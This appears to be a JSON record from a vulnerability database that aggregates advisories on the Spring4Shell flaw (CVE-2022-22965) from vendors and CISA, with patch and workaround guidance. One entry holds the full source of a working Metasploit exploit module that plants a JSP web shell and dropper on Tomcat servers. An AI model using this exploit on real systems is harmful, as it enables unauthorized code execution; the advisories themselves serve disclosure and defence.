"2023-06-14T15:39:04", "description": "3\\. Problem Description \n\nMultiple products impacted by remote code execution vulnerability (CVE-2022-22965).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-02T00:00:00", "type": "vmware", "title": "VMware Response to Spring Framework Remote Code Execution Vulnerability (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-30T00:00:00", "id": "VMSA-2022-0010.5", "href": "https://www.vmware.com/security/advisories/VMSA-2022-0010.5.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "hivepro": [{"lastseen": "2022-04-12T15:26:10", "description": "THREAT LEVEL: Red For a detailed advisory, download the pdf file here A zero-day vulnerability has been discovered in the Spring framework, a Java framework that provides infrastructure support for web application development. This vulnerability came to light after a Chinese researcher made a GitHub commit that was quickly erased. The vulnerability remained unassigned for over 24 hours before being assigned an official identifier CVE-2022-22965. The remote code execution bug affects Spring MVC and Spring WebFlux apps running on JDK 9+. By sending a carefully crafted request to a susceptible server, an attacker could exploit Spring4Shell. The publicly available exploit, on the other hand, requires the software to run as a WAR deployment on Tomcat. If the software is deployed as a Spring Boot executable jar, which is the default, it is not vulnerable to this vulnerability. However, the nature of the vulnerability is wide, and there may be many more ways to exploit it. An active exploitation of Spring4Shell has been observed, an attacker is able to weaponize and execute the Mirai botnet malware on vulnerable servers, specifically in the Singapore region. The Mirai sample is downloaded to the \u201c/tmp\u201d folder and executed after permissions are changed to make them executable using \u201cchmod\u201d Organizations using Spring Framework with version 5.3.x should upgrade to 5.3.18+ and version 5.2.x should upgrade to 5.2.20+. Potential MITRE ATT&amp;CK TTPs are: TA0042: Resource Development T1588: Obtain Capabilities T1588.006: Obtain Capabilities: Vulnerabilities TA0002: Execution T1203: Exploitation for Client Execution Vulnerability Details Indicators of Compromise (IoCs) Patch Links https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement https://tanzu.vmware.com/security/cve-2022-22965 References https://www.praetorian.com/blog/spring-core-jdk9-rce/ https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html https://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/ https://www.trendmicro.com/en_us/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T02:21:11", "type": "hivepro", "title": "RCE Spring Framework Zero-Day vulnerability\u00a0\u201cSpring4Shell\u201d", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-12T02:21:11", "id": "HIVEPRO:41D5BC8D50B4CA10D9CCDA18E6528C27", "href": "https://www.hivepro.com/rce-spring-framework-zero-day-vulnerability-spring4shell/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisco": [{"lastseen": "2023-06-15T18:24:11", "description": "On March 31, 2022, the following critical vulnerability in the Spring Framework affecting Spring MVC and Spring WebFlux applications running on JDK 9+ was released:\n\n CVE-2022-22965: Spring Framework RCE via Data Binding on JDK 9+\n\nFor a description of this vulnerability, see VMware Spring Framework Security Vulnerability Report [\"https://tanzu.vmware.com/security/cve-2022-22965\"].\n\nThis advisory is available at the following link:\nhttps://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-rce-Zx9GUc67 [\"https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-rce-Zx9GUc67\"]", "cvss3": {}, "published": "2022-04-01T23:45:00", "type": "cisco", "title": "Vulnerability in Spring Framework Affecting Cisco Products: March 2022", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2022-22965"], "modified": "2023-02-09T15:14:14", "id": "CISCO-SA-JAVA-SPRING-RCE-ZX9GUC67", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-rce-Zx9GUc67", "cvss": {"score": 9.8, "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}}], "cloudfoundry": [{"lastseen": "2023-06-14T15:05:56", "description": "**Severity**\n\nCritical\n\n**Vendor**\n\nCloud Foundry Foundation\n\n**Description**\n\nIn Cloud Foundry UAA, a remote code execution vulnerability is present due to an issue in the Spring Framework identified by CVE-2022-22965. A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding.\n\n**Affected Cloud Foundry Products and Versions**\n\n_Severity is critical unless otherwise noted._\n\n * UAA Release (OSS) \n * Versions 74.2.0 \u2013 75.17.0\n * CF Deployment \n * Version 12.1.0 and above but below version 20.0\n\n**Mitigation**\n\nUsers of affected products are strongly encouraged to follow the mitigations below. The Cloud Foundry project recommends upgrading the following releases:\n\n * UAA Release (OSS) \n * Upgrade affected versions to 75.18.0 or greater.\n * CF Deployment \n * Upgrade affected versions to 20.0 or greater.\n * Alternatively a workaround can be deployed on affected versions.\n\n**Workaround for CF Deployment \n**\n\n 1. Create a temporary ops file with the following content:\n \n \n - type: replace\r\n \u00a0 path: /releases/name=uaa\r\n \u00a0 value:\r\n \u00a0 \u00a0 \u00a0 name: uaa\r\n \u00a0\u00a0\u00a0\u00a0\u00a0 url: https://bosh.io/d/github.com/cloudfoundry/uaa-release?v=75.18.0\r\n \u00a0\u00a0\u00a0\u00a0\u00a0 version: \"75.18.0\"\r\n \u00a0\u00a0\u00a0\u00a0\u00a0 sha1: 5f9c63ecf952e94ff3ce229eed25069c7ce2a6b0 \n \n--- \n \n 2. Apply this ops-file during subsequent bosh deploys for cf-deployment, until you upgrade cf-deployment to a version where this CVE is fixed. For more information on how to apply ops-files, read the section of the README: <https://github.com/cloudfoundry/cf-deployment#ops-files>\n\n**References:**\n\n<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>\n\n**History**\n\n2022-04-05: Initial vulnerability report published. \n2022-04-21: Added fixed version of CF Deployment\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-05T00:00:00", "type": "cloudfoundry", "title": "CVE-2022-22965: UAA affected by Spring Framework RCE via Data Binding on JDK 9+ | Cloud Foundry", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-05T00:00:00", "id": "CFOUNDRY:D24EF96EB1845EA8878001F85C1C2C75", "href": "https://www.cloudfoundry.org/blog/cve-2022-22965-uaa-affected-by-spring-framework-rce-via-data-binding-on-jdk-9/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2023-06-14T14:47:41", "description": "A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.\n\n \n**Recent assessments:** \n \n**jbaines-r7** at April 01, 2022 6:13pm UTC reported:\n\nIt\u2019s currently difficult to assess the exact value of this vulnerability because we don\u2019t know how common the vulnerable configuration is. We might not even be aware of all the vulnerable configurations at this time. See the Rapid7 analysis for additional details.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 2\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-02T00:00:00", "type": "attackerkb", "title": "CVE-2022-22965", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-02T00:00:00", "id": "AKB:F4BF02AE-B090-4307-89AA-47E57C92EC8F", "href": "https://attackerkb.com/topics/xtgLfwQYBm/cve-2022-22965", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "vaadin": [{"lastseen": "2022-10-18T17:25:13", "description": "A remote code execution (RCE) vulnerability was discovered in the Spring framework, affecting at least Spring versions 4.x and 5.x. A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. Vaadin applications are not affected by default, but the nature of the vulnerability is more general, and there may be other ways to exploit it. Description A remote code execution (RCE) vulnerability was discovered in the Spring framework, affecting at least Spring versions 4.x and 5.x. A Vaadin Flow application is by default not using the vulnerable Spring MVC or Spring WebFlux features but we still strongly recommend upgrading to a non-vulnerable version of Spring. All Hilla applications always use Spring MVC and should be upgraded. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. If you are unable to upgrade to a non-vulnerable version of Spring Boot, you should apply the workaround described in https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement#vulnerability Affected products and mitigation The following products are not vulnerable by default but can be exploited if Spring MVC or Spring WebFlux features are used in the application: Product version Mitigation Vaadin 7 Apply the workaround described in the Spring blog post. The Vaadin Spring integration is based on Spring 4.x has not received the security fix as it is end-of-life. (Vaadin 7 extended maintenance) Vaadin 8 If you can, upgrade to Spring Boot 2.6.6 and. If you are unable to upgrade to Spring Boot 2.6.6, apply the workaround described in the Spring blog post. (Vaadin 8 extended maintenance) Vaadin 10 If you can, upgrade to Spring Boot 2.6.6. If you are unable to upgrade to Spring Boot 2.6.6, apply the workaround described in the Spring blog post Vaadin 14 Upgrade to Spring Boot 2.5.12 or Spring Boot 2.6.6. Vaadin 22 Upgrade to Spring Boot 2.6.6 Vaadin 23 Upgrade to Spring Boot 2.6.6 Affected Hilla projects and mitigation Hilla-based applications include the Spring dependency and are affected by the vulnerability. Product version Mitigation Hilla 1.0.0 - 1.0.3 Upgrade to Spring Boot 2.6.6 How to check if you are vulnerable? You can check if your Vaadin and Vaadin Flow project for the vulnerable dependency e.g. with Maven: % mvn dependency:tree | grep spring-beans[INFO] | | | \\\\- org.springframework:spring-beans:jar:5.3.16:compile If the version is 5.3.18 or newer or 5.2.20 then you are safe. Otherwise you need to update your project. Fix by using one of the following versions: Update to Spring Framework 5.3.18 and 5.2.20, which contain the fixesUpdate to Spring Boot 2.6.6 and 2.5.12 that depend on Spring Framework 5.3.18 Verify that the version with the fix is in place by re-running the dependency check: % mvn dependency:tree | grep spring-beans[INFO] | | | \\\\- org.springframework:spring-beans:jar:5.3.18:compile Remember to rebuild and redeploy your project. References Vendor advisory: https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement Vendor advisory: https://tanzu.vmware.com/security/cve-2022-22965", "cvss3": {}, "published": "2022-04-01T00:00:00", "type": "vaadin", "title": "Spring Core Remote Code Execution via Data Binding on JDK 9+", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-01T00:00:00", "id": "VAADIN:ADVISORY-2022-04-01", "href": "https://vaadin.com/security/2022-04-01", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2022-05-10T15:36:31", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T00:00:00", "type": "packetstorm", "title": "Spring4Shell Spring Framework Class Property Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-10T00:00:00", "id": "PACKETSTORM:167011", "href": "https://packetstormsecurity.com/files/167011/Spring4Shell-Spring-Framework-Class-Property-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ManualRanking # It's going to manipulate the Class Loader \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::FileDropper \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Spring Framework Class property RCE (Spring4Shell)', \n'Description' => %q{ \nSpring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions when running on JDK 9 or above \nand specifically packaged as a traditional WAR and deployed in a standalone Tomcat instance are vulnerable \nto remote code execution due to an unsafe data binding used to populate an object from request parameters \nto set a Tomcat specific ClassLoader. By crafting a request to the application and referencing the \norg.apache.catalina.valves.AccessLogValve class through the classLoader with parameters such as the following: \nclass.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp, an unauthenticated attacker can \ngain remote code execution. \n}, \n'Author' => [ \n'vleminator <vleminator[at]gmail.com>' \n], \n'License' => MSF_LICENSE, \n'References' => [ \n['CVE', '2022-22965'], \n['URL', 'https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement'], \n['URL', 'https://github.com/spring-projects/spring-framework/issues/28261'], \n['URL', 'https://tanzu.vmware.com/security/cve-2022-22965'] \n], \n'Platform' => %w[linux win], \n'Payload' => { \n'Space' => 5000, \n'DisableNops' => true \n}, \n'Targets' => [ \n[ \n'Java', \n{ \n'Arch' => ARCH_JAVA, \n'Platform' => %w[linux win] \n}, \n], \n[ \n'Linux', \n{ \n'Arch' => [ARCH_X86, ARCH_X64], \n'Platform' => 'linux' \n} \n], \n[ \n'Windows', \n{ \n'Arch' => [ARCH_X86, ARCH_X64], \n'Platform' => 'win' \n} \n] \n], \n'DisclosureDate' => '2022-03-31', \n'DefaultTarget' => 0, \n'Notes' => { \n'AKA' => ['Spring4Shell', 'SpringShell'], \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options( \n[ \nOpt::RPORT(8080), \nOptString.new('TARGETURI', [ true, 'The path to the application action', '/app/example/HelloWorld.action']), \nOptString.new('PAYLOAD_PATH', [true, 'Path to write the payload', 'webapps/ROOT']), \nOptEnum.new('HTTP_METHOD', [false, 'HTTP method to use', 'Automatic', ['Automatic', 'GET', 'POST']]), \n] \n) \nregister_advanced_options [ \nOptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) \n] \nend \n \ndef jsp_dropper(file, exe) \n# The sun.misc.BASE64Decoder.decodeBuffer API is no longer available in Java 9. \ndropper = <<~EOS \n<%@ page import=\\\"java.io.FileOutputStream\\\" %> \n<%@ page import=\\\"java.util.Base64\\\" %> \n<%@ page import=\\\"java.io.File\\\" %> \n<% \nFileOutputStream oFile = new FileOutputStream(\\\"#{file}\\\", false); \noFile.write(Base64.getDecoder().decode(\\\"#{Rex::Text.encode_base64(exe)}\\\")); \noFile.flush(); \noFile.close(); \nFile f = new File(\\\"#{file}\\\"); \nf.setExecutable(true); \nRuntime.getRuntime().exec(\\\"#{file}\\\"); \n%> \nEOS \n \ndropper \nend \n \ndef modify_class_loader(method, opts) \ncl_prefix = 'class.module.classLoader' \n \nsend_request_cgi({ \n'uri' => normalize_uri(target_uri.path.to_s), \n'version' => '1.1', \n'method' => method, \n'headers' => { \n'c1' => '<%', # %{c1}i replacement in payload \n'c2' => '%>' # %{c2}i replacement in payload \n}, \n\"vars_#{method == 'GET' ? 'get' : 'post'}\" => { \n\"#{cl_prefix}.resources.context.parent.pipeline.first.pattern\" => opts[:payload], \n\"#{cl_prefix}.resources.context.parent.pipeline.first.directory\" => opts[:directory], \n\"#{cl_prefix}.resources.context.parent.pipeline.first.prefix\" => opts[:prefix], \n\"#{cl_prefix}.resources.context.parent.pipeline.first.suffix\" => opts[:suffix], \n\"#{cl_prefix}.resources.context.parent.pipeline.first.fileDateFormat\" => opts[:file_date_format] \n} \n}) \nend \n \ndef check_log_file \nprint_status(\"#{peer} - Waiting for the server to flush the logfile\") \nprint_status(\"#{peer} - Executing JSP payload at #{full_uri(@jsp_file)}\") \n \nsucceeded = retry_until_true(timeout: 60) do \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(@jsp_file) \n}) \n \nres&.code == 200 && !res.body.blank? \nend \n \nfail_with(Failure::UnexpectedReply, \"Seems the payload hasn't been written\") unless succeeded \n \nprint_good(\"#{peer} - Log file flushed\") \nend \n \n# Fix the JSP payload to make it valid once is dropped \n# to the log file \ndef fix(jsp) \noutput = '' \njsp.each_line do |l| \nif l =~ /<%.*%>/ \noutput << l \nelsif l =~ /<%/ \nnext \nelsif l =~ /%>/ \nnext \nelsif l.chomp.empty? \nnext \nelse \noutput << \"<% #{l.chomp} %>\" \nend \nend \noutput \nend \n \ndef create_jsp \njsp = <<~EOS \n<% \nFile jsp=new File(getServletContext().getRealPath(File.separator) + File.separator + \"#{@jsp_file}\"); \njsp.delete(); \n%> \n#{Faker::Internet.uuid} \nEOS \nif target['Arch'] == ARCH_JAVA \njsp << fix(payload.encoded) \nelse \npayload_exe = generate_payload_exe \npayload_filename = rand_text_alphanumeric(rand(4..7)) \n \nif target['Platform'] == 'win' \npayload_path = datastore['WritableDir'] + '\\\\' + payload_filename \nelse \npayload_path = datastore['WritableDir'] + '/' + payload_filename \nend \n \njsp << jsp_dropper(payload_path, payload_exe) \nregister_files_for_cleanup(payload_path) \nend \n \njsp \nend \n \ndef check \n@checkcode = _check \nend \n \ndef _check \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(Rex::Text.rand_text_alpha_lower(4..6)) \n) \n \nreturn CheckCode::Unknown('Web server seems unresponsive') unless res \n \nif res.headers.key?('Server') \nres.headers['Server'].match(%r{(.*)/([\\d|.]+)$}) \nelse \nres.body.match(%r{Apache\\s(.*)/([\\d|.]+)}) \nend \n \nserver = Regexp.last_match(1) || nil \nversion = Rex::Version.new(Regexp.last_match(2)) || nil \n \nreturn Exploit::CheckCode::Safe('Application does not seem to be running under Tomcat') unless server && server.match(/Tomcat/) \n \nvprint_status(\"Detected #{server} #{version} running\") \n \nif datastore['HTTP_METHOD'] == 'Automatic' \n# prefer POST over get to keep the vars out of the query string if possible \nmethods = %w[POST GET] \nelse \nmethods = [ datastore['HTTP_METHOD'] ] \nend \n \nmethods.each do |method| \nvars = \"vars_#{method == 'GET' ? 'get' : 'post'}\" \nres = send_request_cgi( \n'method' => method, \n'uri' => normalize_uri(datastore['TARGETURI']), \nvars => { 'class.module.classLoader.DefaultAssertionStatus' => Rex::Text.rand_text_alpha_lower(4..6) } \n) \n \n# setting the default assertion status to a valid status \nsend_request_cgi( \n'method' => method, \n'uri' => normalize_uri(datastore['TARGETURI']), \nvars => { 'class.module.classLoader.DefaultAssertionStatus' => 'true' } \n) \nreturn Exploit::CheckCode::Appears(details: { method: method }) if res.code == 400 \nend \n \nExploit::CheckCode::Safe \nend \n \ndef exploit \nprefix_jsp = rand_text_alphanumeric(rand(3..5)) \ndate_format = rand_text_numeric(rand(1..4)) \n@jsp_file = prefix_jsp + date_format + '.jsp' \nhttp_method = datastore['HTTP_METHOD'] \nif http_method == 'Automatic' \n# if the check was skipped but we need to automatically identify the method, we have to run it here \n@checkcode = check if @checkcode.nil? \nhttp_method = @checkcode.details[:method] \nfail_with(Failure::BadConfig, 'Failed to automatically identify the HTTP method') if http_method.blank? \n \nprint_good(\"Automatically identified HTTP method: #{http_method}\") \nend \n \n# if the check method ran automatically, add a short delay before continuing with exploitation \nsleep(5) if @checkcode \n \n# Prepare the JSP \nprint_status(\"#{peer} - Generating JSP...\") \n \n# rubocop:disable Style/FormatStringToken \njsp = create_jsp.gsub('<%', '%{c1}i').gsub('%>', '%{c2}i') \n# rubocop:enable Style/FormatStringToken \n \n# Modify the Class Loader \nprint_status(\"#{peer} - Modifying Class Loader...\") \nproperties = { \npayload: jsp, \ndirectory: datastore['PAYLOAD_PATH'], \nprefix: prefix_jsp, \nsuffix: '.jsp', \nfile_date_format: date_format \n} \nres = modify_class_loader(http_method, properties) \nunless res \nfail_with(Failure::TimeoutExpired, \"#{peer} - No answer\") \nend \n \n# No matter what happened, try to 'restore' the Class Loader \nproperties = { \npayload: '', \ndirectory: '', \nprefix: '', \nsuffix: '', \nfile_date_format: '' \n} \n \nmodify_class_loader(http_method, properties) \n \ncheck_log_file \n \nhandler \nend \n \n# Retry the block until it returns a truthy value. Each iteration attempt will \n# be performed with expoential backoff. If the timeout period surpasses, false is returned. \ndef retry_until_true(timeout:) \nstart_time = Process.clock_gettime(Process::CLOCK_MONOTONIC, :second) \nending_time = start_time + timeout \nretry_count = 0 \nwhile Process.clock_gettime(Process::CLOCK_MONOTONIC, :second) < ending_time \nresult = yield \nreturn result if result \n \nretry_count += 1 \nremaining_time_budget = ending_time - Process.clock_gettime(Process::CLOCK_MONOTONIC, :second) \nbreak if remaining_time_budget <= 0 \n \ndelay = 2**retry_count \nif delay >= remaining_time_budget \ndelay = remaining_time_budget \nvprint_status(\"Final attempt. Sleeping for the remaining #{delay} seconds out of total timeout #{timeout}\") \nelse \nvprint_status(\"Sleeping for #{delay} seconds before attempting again\") \nend \n \nsleep delay \nend \n \nfalse \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/167011/spring_framework_rce_spring4shell.rb.txt"}], "checkpoint_advisories": [{"lastseen": "2022-04-08T19:29:06", "description": "A remote code execution vulnerability exists in Spring Core. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T00:00:00", "type": "checkpoint_advisories", "title": "Spring Core Remote Code Execution (CVE-2022-22965)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-05T00:00:00", "id": "CPAI-2022-0104", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2023-07-21T17:22:44", "description": "Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-04T00:00:00", "type": "cisa_kev", "title": "Spring Framework JDK 9+ Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-04T00:00:00", "id": "CISA-KEV-CVE-2022-22965", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "kitploit": [{"lastseen": "2023-06-14T15:21:12", "description": "[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaq3n6pTYJadYNCpjVegHxZFc8ZwiZUtKbPgpxPlbSd7vQgjUEfKFw0cO8jrAjpHsv_tzZAG_chVh9Mwrrh9UpIHbkniKAjKptmjj-rJ2uOjSxvBrPfVn3H2AZpIjCO-1Lrt4HnOxh7SS5SrMbbIttLpUzw7xDtIat1yKhbVk_0JgC8RDhwEXTMEuY/s745/Spring4Shell.png>)\n\n \n\n\nThis is a dockerized application that is [vulnerable](<https://www.kitploit.com/search/label/Vulnerable> \"vulnerable\" ) to the Spring4Shell [vulnerability](<https://www.kitploit.com/search/label/Vulnerability> \"vulnerability\" ) (CVE-2022-22965). Full Java source for the war is provided and modifiable, the war will get re-built whenever the docker image is built. The built WAR will then be loaded 